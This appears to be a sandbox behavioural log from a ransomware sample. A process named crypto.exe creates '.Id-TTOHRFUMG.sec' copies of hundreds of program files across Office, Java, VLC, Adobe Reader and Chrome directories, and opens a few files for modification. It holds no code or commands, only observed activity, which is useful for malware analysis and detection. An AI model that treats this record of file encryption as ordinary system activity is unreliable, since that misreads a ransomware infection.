File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Metro.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Person.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\row_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGN.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Earthy.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME05.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplateRTL.html.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESNL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\OFFISUPP.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\AUDIOSEARCHLTS.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\US_export_policy.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106020.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\drive.crx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\mpvis.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ALERT.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libalphamask_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\localedata.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19827_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107458.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-private-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mspub.exe.manifest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\calendar.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03236_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00235_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101980.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0233070.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Sts.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB2B.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\mozglue.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\liboggspots_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR51F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Library\Analysis\ANALYS32.XLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01296_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\VSTAProject.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\installer.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\selection_subpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0158007.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18254_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MORPH9.DLL.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCD98SP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_mmx_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\InkSeg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\glass.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00735_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLOGO.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_asf_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MOR6INT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBPAGE.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00720_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\StatusOnline.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Newsprint.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\server\jvm.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\npt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01358_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0298653.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ResumeUnlock.wma.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\macroprogress.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libcaf_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\1.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02312_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00126_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21312_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Issues.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7EN.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\RESUME.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Denver.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Pushpin.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\view.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\uz.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\LICENSE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\npjp2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsMacroTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01330_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0215086.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115867.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21338_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115856.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icucnv36.dll	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\external_extensions.json.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\REFEDIT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Mexico_City.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0213449.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Median.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Groove Starter Template.xsn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\MSTHED98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7ge.kic.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\RESUME.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196364.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Module.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_VelvetRose.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libx26410b_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00673L.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\QuizShow.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Rangoon.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090783.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsBrowserUpgrade.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es-419.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\sk.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\7.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_item.png.Id-TTOHRFUMG.sec	crypto.exe
